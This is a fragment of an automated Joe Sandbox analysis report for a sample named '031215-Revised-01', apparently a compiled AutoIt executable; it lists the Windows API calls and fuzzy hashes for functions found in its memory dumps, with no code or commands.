                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction ID: 695c1374db9719516f13716646ec579bd3a283909b94a6a3b545f1162212a3ab
                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                        • Instruction Fuzzy Hash: FA311674A0020ADBC758EF69D580969FBA2FF49310B2482A5E849CF751D731EEC1CBC0
                                        APIs
                                          • Part of subcall function 00074E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E9C
                                          • Part of subcall function 00074E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00074EAE
                                          • Part of subcall function 00074E90: FreeLibrary.KERNEL32(00000000,?,?,00074EDD,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074EFD
                                          • Part of subcall function 00074E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E62
                                          • Part of subcall function 00074E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00074E74
                                          • Part of subcall function 00074E59: FreeLibrary.KERNEL32(00000000,?,?,000B3CDE,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074E87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 7bb5c82de1d0095be02d83efd4d5febf1cfe1cb4b56cb5443a15328cc7fd8b73
                                        • Instruction ID: 8a7aea85d6306422029c7b49dccc6de84e497cf9e66994e1d65848f53e90ff1e
                                        • Opcode Fuzzy Hash: 7bb5c82de1d0095be02d83efd4d5febf1cfe1cb4b56cb5443a15328cc7fd8b73
                                        • Instruction Fuzzy Hash: 8711E731A00205ABDF24FF60DC02FED77A5AF40711F20C42DF54AA61C2DFB89A459B94
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: cfe78d4a30eabf751c1dd50c6656beb070d1e8c0274f3ce8154aa75b38fa3355
                                        • Instruction ID: 0837bfaf8b8d4d8103984c74357f10fb1ebcf84ab4c062cf3a6505a4b19aae7f
                                        • Opcode Fuzzy Hash: cfe78d4a30eabf751c1dd50c6656beb070d1e8c0274f3ce8154aa75b38fa3355
                                        • Instruction Fuzzy Hash: 5A11187590420AAFCB15DF98E9419DE7BF9EF49314F148059F808AB312DA31DA11CBA5
                                        APIs
                                          • Part of subcall function 000A4C7D: RtlAllocateHeap.NTDLL(00000008,00071129,00000000,?,000A2E29,00000001,00000364,?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?), ref: 000A4CBE
                                        • _free.LIBCMT ref: 000A506C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction ID: 577205c389a08045f2fc90533c77d58859d9370347d36b42dcbe815168247093
                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                        • Instruction Fuzzy Hash: 1B014E722047045BE3318F95DC45E9AFBECFB8A370F25051DE184832C0E6706805C774
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction ID: fa39d63f5c00e36a7d067b5c7dfeaa82316dd03b60575e6e7a0531e08feb2eac
                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                        • Instruction Fuzzy Hash: D8F0F432510E10AADE317AA9DC05BDA33989FA33B4F100725F820962D3DB70DC01A6A5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID:
                                        • API String ID: 176396367-0
                                        • Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                        • Instruction ID: 972b0214609d4d6ff08806e3665261eb5b2606036ad6191a0a3f182e87aa50b7
                                        • Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
                                        • Instruction Fuzzy Hash: BBF0CD736007056ED7255F38D806EA7BB94EB44760F10853AF619CB1D2DB71E51087A4
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,00071129,00000000,?,000A2E29,00000001,00000364,?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?), ref: 000A4CBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 76307db6c3ce195d99abeb1c5f6717844b172cd17c41ee9af9563c198a3a2ff2
                                        • Instruction ID: fc556d1419c3d57a8da48a6355c7eaf7694b06e9a3d4157297ea744175d2d130
                                        • Opcode Fuzzy Hash: 76307db6c3ce195d99abeb1c5f6717844b172cd17c41ee9af9563c198a3a2ff2
                                        • Instruction Fuzzy Hash: A5F0E93960622467DFE15FE29C09F9A37C8BFC37B0B144221B81DE7191CAF0D80156E0
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 25d2d7ee1fd53ce6d22d1ec45bc6aed9cb068f6634d524e18a95bed7640b4831
                                        • Instruction ID: 24cebe2a869a863aa5d0f01cd3dee5035c345b25ee33eed80ab2c048266ce3a7
                                        • Opcode Fuzzy Hash: 25d2d7ee1fd53ce6d22d1ec45bc6aed9cb068f6634d524e18a95bed7640b4831
                                        • Instruction Fuzzy Hash: 70E0ED31102326A6EA312BE69C05FDA3A88AF43BB0F050120BC0496892DF28DE0292E0
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,00141418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00074F6D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 339e6bf147ad21ace937890510cba0c30e822454159575961f0508ae955bb16e
                                        • Instruction ID: a40bbf57f4aea35669bf90ddc7c629925e36f5e36a2a34dc761313cdc85cfbbb
                                        • Opcode Fuzzy Hash: 339e6bf147ad21ace937890510cba0c30e822454159575961f0508ae955bb16e
                                        • Instruction Fuzzy Hash: BBF0A970805342CFCB349F24D490826FBE0EF00329320CA7EE1EE82621C7369884DF04
                                        APIs
                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00072DC4
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LongNamePath_wcslen
                                        • String ID:
                                        • API String ID: 541455249-0
                                        • Opcode ID: a764689968572bbb9dbf23215b0e84400a99848acdc513d6496f9dac7133f30d
                                        • Instruction ID: 1b88dbd068e74a0dc3a77850050af2b99c7338c79bbd82e05da7e550161a0d19
                                        • Opcode Fuzzy Hash: a764689968572bbb9dbf23215b0e84400a99848acdc513d6496f9dac7133f30d
                                        • Instruction Fuzzy Hash: 3FE0CD72A001245BC71093589C05FEA77DDDFC8790F044171FD09D7249DA64ADC0C590
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID:
                                        • API String ID: 2638373210-0
                                        • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction ID: 5fa82d7c74d40bbb30e7500dbfd073c2231fdb996f6285eed13b7f225e3b5849
                                        • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                        • Instruction Fuzzy Hash: 30E0DFB0209B004FCF389A28A8517F7B7E89F09300F00082EF6DF92212E57228418A0D
                                        APIs
                                          • Part of subcall function 00073837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00073908
                                          • Part of subcall function 0007D730: GetInputState.USER32 ref: 0007D807
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00072B6B
                                          • Part of subcall function 000730F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0007314E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                        • String ID:
                                        • API String ID: 3667716007-0
                                        • Opcode ID: 01c6c7e3b045d97caf97f9e07fca64021de123aaff110004042f6a1cc2cf7305
                                        • Instruction ID: 7abae63441821988f969bfd13122b3a77b587d641afaa88f6fd072afdb2dd339
                                        • Opcode Fuzzy Hash: 01c6c7e3b045d97caf97f9e07fca64021de123aaff110004042f6a1cc2cf7305
                                        • Instruction Fuzzy Hash: DDE07D21F0420813C608BB30A8124FDB7599FD2311F40853EF08E431B3CF2C89C5835A
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,000B0704,?,?,00000000,?,000B0704,00000000,0000000C), ref: 000B03B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 89467b7899d325a8228b1d28eabe7990d6b92561eb7674a1e5d370f975243130
                                        • Instruction ID: 22fc57f339a883237423f366fa14cb9fdeeeb34726a496db24b3bb6cd4e021e3
                                        • Opcode Fuzzy Hash: 89467b7899d325a8228b1d28eabe7990d6b92561eb7674a1e5d370f975243130
                                        • Instruction Fuzzy Hash: C9D06C3204010DFBDF029F84DD06EDA3BAAFB48714F014100BE5856020C772E861AB90
                                        APIs
                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00071CBC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem
                                        • String ID:
                                        • API String ID: 3098949447-0
                                        • Opcode ID: 183ebecb38316ef79f1e5496f15f6fa05b081fc72644c146ff027757d749a148
                                        • Instruction ID: 4fb6ff73f4c030e68ad1b9be4fe2da6af17923a1c4700c21f40272c27f665f49
                                        • Opcode Fuzzy Hash: 183ebecb38316ef79f1e5496f15f6fa05b081fc72644c146ff027757d749a148
                                        • Instruction Fuzzy Hash: 4BC0483A380205AAE2148B80AC4AF5077A4A34AB10F448001F649A99F382A228E0AA90
                                        APIs
                                        • Sleep.KERNELBASE(000001F4), ref: 013922B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723353870.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1390000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction ID: 1d31e983dcde7280e6c6dbfe17bbc881d9be77c09f0ff9c824718a33a71bfcd2
                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                        • Instruction Fuzzy Hash: A3E0E67494010EEFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2281D6319D508A72
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0010961A
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0010965B
                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0010969F
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001096C9
                                        • SendMessageW.USER32 ref: 001096F2
                                        • GetKeyState.USER32(00000011), ref: 0010978B
                                        • GetKeyState.USER32(00000009), ref: 00109798
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001097AE
                                        • GetKeyState.USER32(00000010), ref: 001097B8
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001097E9
                                        • SendMessageW.USER32 ref: 00109810
                                        • SendMessageW.USER32(?,00001030,?,00107E95), ref: 00109918
                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0010992E
                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00109941
                                        • SetCapture.USER32(?), ref: 0010994A
                                        • ClientToScreen.USER32(?,?), ref: 001099AF
                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001099BC
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001099D6
                                        • ReleaseCapture.USER32 ref: 001099E1
                                        • GetCursorPos.USER32(?), ref: 00109A19
                                        • ScreenToClient.USER32(?,?), ref: 00109A26
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00109A80
                                        • SendMessageW.USER32 ref: 00109AAE
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00109AEB
                                        • SendMessageW.USER32 ref: 00109B1A
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00109B3B
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00109B4A
                                        • GetCursorPos.USER32(?), ref: 00109B68
                                        • ScreenToClient.USER32(?,?), ref: 00109B75
                                        • GetParent.USER32(?), ref: 00109B93
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00109BFA
                                        • SendMessageW.USER32 ref: 00109C2B
                                        • ClientToScreen.USER32(?,?), ref: 00109C84
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00109CB4
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00109CDE
                                        • SendMessageW.USER32 ref: 00109D01
                                        • ClientToScreen.USER32(?,?), ref: 00109D4E
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00109D82
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00109E05
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3429851547-4164748364
                                        • Opcode ID: da737a203d48fe7e4995d50317ba9650ea9209601e0562363a871857e38c225e
                                        • Instruction ID: 341071ed9187ef95c116ffc2dbaf1e536fde14767ec9fe03351c8a64ac2b2c47
                                        • Opcode Fuzzy Hash: da737a203d48fe7e4995d50317ba9650ea9209601e0562363a871857e38c225e
                                        • Instruction Fuzzy Hash: 5042AE75608201AFD724CF24CC64AAABBE5FF49314F144619F6D9876E2D7B2E890CF81
                                        APIs
                                        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001048F3
                                        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00104908
                                        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00104927
                                        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0010494B
                                        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0010495C
                                        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0010497B
                                        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001049AE
                                        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001049D4
                                        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00104A0F
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00104A56
                                        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00104A7E
                                        • IsMenu.USER32(?), ref: 00104A97
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00104AF2
                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00104B20
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00104B94
                                        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00104BE3
                                        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00104C82
                                        • wsprintfW.USER32 ref: 00104CAE
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00104CC9
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00104CF1
                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00104D13
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00104D33
                                        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00104D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 4054740463-328681919
                                        • Opcode ID: 6f665931b2d327691f7eff92df5e37844fab10f3fdf2ed93f4bcd1f971155fe3
                                        • Instruction ID: a3e521a7f6fe22708324968651facefccedc23e93cf0e30932bbe7c5bfb0f915
                                        • Opcode Fuzzy Hash: 6f665931b2d327691f7eff92df5e37844fab10f3fdf2ed93f4bcd1f971155fe3
